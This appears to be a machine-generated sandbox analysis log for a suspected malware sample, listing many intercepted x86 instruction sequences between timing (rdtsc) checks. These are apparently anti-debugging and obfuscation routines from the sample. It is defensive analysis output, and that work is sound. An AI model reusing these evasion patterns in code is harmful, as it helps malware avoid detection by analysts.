                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 46D92D second address: 46D93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F4EF0C09E16h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CE0C1 second address: 4CE0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79898h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDC8B second address: 4CDC9F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4EF0C09E1Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDC9F second address: 4CDCA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCA3 second address: 4CDCAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCAD second address: 4CDCB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCB3 second address: 4CDCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4CDCB7 second address: 4CDCD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C7988Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F4EF0C7988Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D87FD second address: 4D8822 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4EF0C09E1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d jnp 00007F4EF0C09E18h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8822 second address: 4D8827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8827 second address: 4D882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D88F4 second address: 4D88FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4EF0C79886h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D88FF second address: 4D8905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8905 second address: 4D8909 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8909 second address: 4D8930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jl 00007F4EF0C09E20h 0x00000012 jmp 00007F4EF0C09E1Ah 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jc 00007F4EF0C09E1Ch 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4D8930 second address: 4D8951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F4EF0C79886h 0x0000000b jnp 00007F4EF0C79886h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007F4EF0C79888h 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DC98E second address: 4DC9F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Dh 0x00000009 popad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e jmp 00007F4EF0C09E28h 0x00000013 jmp 00007F4EF0C09E1Ah 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4EF0C09E23h 0x00000020 jmp 00007F4EF0C09E28h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DC9F4 second address: 4DC9FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DC9FA second address: 4DCA0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F4EF0C09E16h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DCA0A second address: 4DCA0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DCE5C second address: 4DCE60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DCE60 second address: 4DCE6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4EF0C7988Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD137 second address: 4DD14F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F4EF0C09E1Eh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jp 00007F4EF0C09E16h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD14F second address: 4DD155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD155 second address: 4DD15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD15B second address: 4DD15F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD3DE second address: 4DD3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD3E4 second address: 4DD3EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4DD3EC second address: 4DD3F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E2844 second address: 4E284E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E2C63 second address: 4E2C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F4EF0C09E28h 0x0000000a js 00007F4EF0C09E22h 0x00000010 jbe 00007F4EF0C09E1Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E2F6C second address: 4E2F7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4EF0C79886h 0x0000000a jng 00007F4EF0C79886h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E322D second address: 4E323A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F4EF0C09E16h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33B6 second address: 4E33BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33BA second address: 4E33C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33C0 second address: 4E33C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E33C4 second address: 4E33D2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F4EF0C09E16h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E227A second address: 4E227F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E6B7D second address: 4E6BAB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4EF0C09E1Eh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a je 00007F4EF0C09E16h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4EF0C09E27h 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4E6BAB second address: 4E6BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79896h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9237 second address: 48DEEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 add edi, dword ptr [ebp+122D1DC0h] 0x0000000d clc 0x0000000e lea eax, dword ptr [ebp+12484F59h] 0x00000014 pushad 0x00000015 mov dword ptr [ebp+122D2A53h], ebx 0x0000001b and ebx, 23B54027h 0x00000021 popad 0x00000022 nop 0x00000023 push eax 0x00000024 push esi 0x00000025 jmp 00007F4EF0C09E1Eh 0x0000002a pop esi 0x0000002b pop eax 0x0000002c push eax 0x0000002d jg 00007F4EF0C09E24h 0x00000033 nop 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007F4EF0C09E18h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D1D54h], edx 0x00000054 sbb edx, 46A2C6E0h 0x0000005a call dword ptr [ebp+122D3410h] 0x00000060 jmp 00007F4EF0C09E1Ch 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 pushad 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A948C second address: 4A9496 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4EF0C7988Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A97D8 second address: 4A97DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9843 second address: 4A989B instructions: 0x00000000 rdtsc 0x00000002 je 00007F4EF0C79886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b jmp 00007F4EF0C79893h 0x00000010 pop ebx 0x00000011 popad 0x00000012 xor dword ptr [esp], 42EC9857h 0x00000019 and di, B42Ah 0x0000001e call 00007F4EF0C79889h 0x00000023 jp 00007F4EF0C79892h 0x00000029 jnc 00007F4EF0C7988Ch 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push edi 0x00000033 jmp 00007F4EF0C7988Ch 0x00000038 pop edi 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A989B second address: 4A98CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jc 00007F4EF0C09E16h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007F4EF0C09E28h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A99D7 second address: 4A99DC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9BC3 second address: 4A9BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4A9CFB second address: 4A9D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 jmp 00007F4EF0C7988Ch 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D2F04h], ebx 0x00000012 mov dx, bx 0x00000015 push 00000004h 0x00000017 push esi 0x00000018 mov cl, F3h 0x0000001a pop ecx 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 pop eax 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AA10A second address: 4AA114 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE08B second address: 4EE0AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79896h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F4EF0C79886h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4AA2B6 second address: 4AA2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE1E6 second address: 4EE1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE1EB second address: 4EE1F5 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4EF0C09E1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE4AC second address: 4EE4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE4B1 second address: 4EE4D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F4EF0C09E16h 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jnp 00007F4EF0C09E16h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jp 00007F4EF0C09E18h 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE61E second address: 4EE64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4EF0C79886h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4EF0C7988Bh 0x00000011 jmp 00007F4EF0C79895h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE64A second address: 4EE64E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE64E second address: 4EE65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4EF0C79886h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE65E second address: 4EE668 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4EF0C09E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE902 second address: 4EE906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE906 second address: 4EE90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE90C second address: 4EE91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4EF0C7988Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE91A second address: 4EE922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EE922 second address: 4EE937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C79891h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEA7C second address: 4EEA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4EF0C09E16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEA86 second address: 4EEAA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4EF0C79897h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAA7 second address: 4EEAAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAAB second address: 4EEAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAB8 second address: 4EEAE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4EF0C09E1Bh 0x00000009 jne 00007F4EF0C09E16h 0x0000000f jmp 00007F4EF0C09E25h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAE3 second address: 4EEAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAE9 second address: 4EEAFD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4EF0C09E16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F4EF0C09E16h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4EEAFD second address: 4EEB01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F4660 second address: 4F4681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4EF0C09E25h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F4681 second address: 4F4685 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F4685 second address: 4F468B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F3337 second address: 4F3346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007F4EF0C79886h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F3659 second address: 4F365D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F365D second address: 4F3661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F40BC second address: 4F40C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4EF0C09E18h 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96C6 second address: 4F96CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96CA second address: 4F96D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96D0 second address: 4F96DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4EF0C79886h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F96DA second address: 4F96E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F8F6A second address: 4F8F87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4EF0C79886h 0x00000008 jmp 00007F4EF0C7988Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F8F87 second address: 4F8F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F9122 second address: 4F9152 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jno 00007F4EF0C7989Fh 0x0000000e jnp 00007F4EF0C7989Ch 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F9152 second address: 4F9158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeRDTSC instruction interceptor: First address: 4F9292 second address: 4F92AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F4EF0C79886h 0x00000011 jmp 00007F4EF0C7988Ch 0x00000016 rdtsc
